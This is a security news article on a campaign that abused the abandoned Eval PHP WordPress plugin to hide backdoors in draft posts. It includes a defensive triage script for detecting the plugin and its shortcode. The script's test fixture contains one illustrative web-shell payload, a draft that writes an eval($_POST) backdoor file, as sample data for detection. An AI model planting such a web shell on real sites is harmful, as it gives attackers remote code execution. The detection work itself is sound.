Hackers Abuse Eval PHP WordPress Plugin To Deploy Backdoors

Researchers found active exploitation of the Eval PHP WordPress plugin to deploy backdoors on target websites. The plugin had been abandoned for years, and its core feature, executing PHP code placed inside posts, is exactly what an attacker wants: no bug has to be exploited, because anyone able to install the plugin can run arbitrary PHP on the server through it.


Eval PHP WordPress Plugin Abuse For Backdoors

A recent post from Sucuri elaborated on a malicious campaign actively exploiting the outdated Eval PHP plugin for installing backdoors.

As explained (and as evident from the plugin's official page), Eval PHP received its last major update 11 years ago. The plugin let WordPress admins add PHP code to an article or blog post, disable PHP error messages, and perform other related functions. Over time the developer stopped updating it, and it has remained an abandoned plugin in the WordPress repository ever since.

However, despite remaining dormant for a decade, Sucuri observed a sudden spike in its installation count in April 2023. That prompted them to look closer, which is how they uncovered the malicious campaign abusing the plugin.

Briefly, the researchers noticed that the threat actors are using the Eval PHP plugin to infect websites with backdoors. They first quietly install the plugin on a target website. This step is easy because the plugin is still available from the official WordPress plugin repository; it does, however, require an account with administrator privileges, so the attackers must already control such an account on the site.

The timing of that installation spike matched the researchers' observations of an ongoing campaign compromising websites with backdoors.

As Sucuri explained, the attackers placed malicious PHP into posts that they saved as drafts rather than published. A draft never appears on the public site, yet the embedded PHP still runs when the plugin processes the post content, and that execution is what drops the backdoor on the server. In some cases, the attackers created these drafts with admin accounts.

Check Your Websites For Eval PHP

According to the researchers, the most effective way for WordPress admins to detect this compromise is to look for the Eval PHP plugin on their sites. If an admin did not install it, its presence is a strong indicator of compromise, and every post, drafts included, that contains the plugin's shortcode should be treated as an attacker payload and as a sign that a backdoor may already be on disk.
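The two checks above, the plugin directory and posts carrying its shortcode, as a small offline triage script. This is an added example, not code from Sucuri's report or from the plugin, and it assumes the plugin sits under its wordpress.org slug `wp-content/plugins/evalphp/` and that post data arrives as a text export with one `<ID>|<post_status>|<post_content>` record per line (a constructed format standing in for a `wp_posts` query, so the script runs without a database). The fixture site, plugin files and the post export are all constructed inline.

```shell
#!/bin/sh
# Added example, not code from Sucuri's report: offline triage of a WordPress
# tree for the Eval PHP plugin and for posts carrying its [evalphp] shortcode.
# Assumptions: the plugin is installed under wp-content/plugins/evalphp/ (its
# wordpress.org slug), and post data is supplied as a text export with one
# record per line, "<ID>|<post_status>|<post_content>", a constructed format
# used here so the check runs without a database.

# Succeeds (exit 0) when the Eval PHP plugin directory exists under the WP root.
evalphp_installed() {
    [ -d "$1/wp-content/plugins/evalphp" ]
}

# Prints "<ID> <post_status>" for every record whose content contains an
# [evalphp shortcode. Exit 0 if at least one record matched, 1 otherwise.
# Drafts are reported too, since the campaign hid its payloads in drafts.
find_evalphp_posts() {
    hits=$(grep -F '[evalphp' "$1" | awk -F'|' '{ print $1, $2 }')
    [ -n "$hits" ] && printf '%s\n' "$hits"
}

# --- constructed fixtures ---------------------------------------------------
WORK=$(mktemp -d)

# A site with the plugin dropped in (what an infected install looks like).
INFECTED_ROOT="$WORK/infected"
mkdir -p "$INFECTED_ROOT/wp-content/plugins/evalphp" \
         "$INFECTED_ROOT/wp-content/plugins/akismet"
: > "$INFECTED_ROOT/wp-content/plugins/evalphp/evalphp.php"

# A site without it.
CLEAN_ROOT="$WORK/clean"
mkdir -p "$CLEAN_ROOT/wp-content/plugins/akismet"

# Post export for the infected site: one benign published post, one draft
# carrying a constructed, illustrative payload, one benign draft.
INFECTED_EXPORT="$WORK/infected-posts.txt"
cat > "$INFECTED_EXPORT" <<'EOF'
101|publish|<p>Welcome to our store.</p>
102|draft|[evalphp] file_put_contents(ABSPATH.'x.php', '<?php eval($_POST["c"]);'); [/evalphp]
103|draft|<p>Spring catalogue, still being written.</p>
EOF

# Post export for the clean site.
CLEAN_EXPORT="$WORK/clean-posts.txt"
printf '%s\n' '201|publish|<p>About us</p>' > "$CLEAN_EXPORT"

# --- run the triage on the infected fixture ---------------------------------
if evalphp_installed "$INFECTED_ROOT"; then
    echo "Eval PHP plugin present under $INFECTED_ROOT (did you install it?)"
fi
if find_evalphp_posts "$INFECTED_EXPORT"; then
    echo "^ the posts listed above contain [evalphp] shortcodes; treat them as attacker payloads"
fi
```

On a live site the first check is `wp plugin list --field=name` (WP-CLI) piped through `grep -x evalphp`, and the second is a query over `wp_posts.post_content` for the string `[evalphp`; the export format above only stands in for that query. Do not open a suspicious draft in the WordPress preview to "see what it does": rendering the post is what executes the shortcode, so inspect the content from the database or an export instead.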

Sucuri also recommends securing admin accounts with 2FA, keeping the site and its plugins updated, and running a robust WAF to reduce the chance of such abuse.
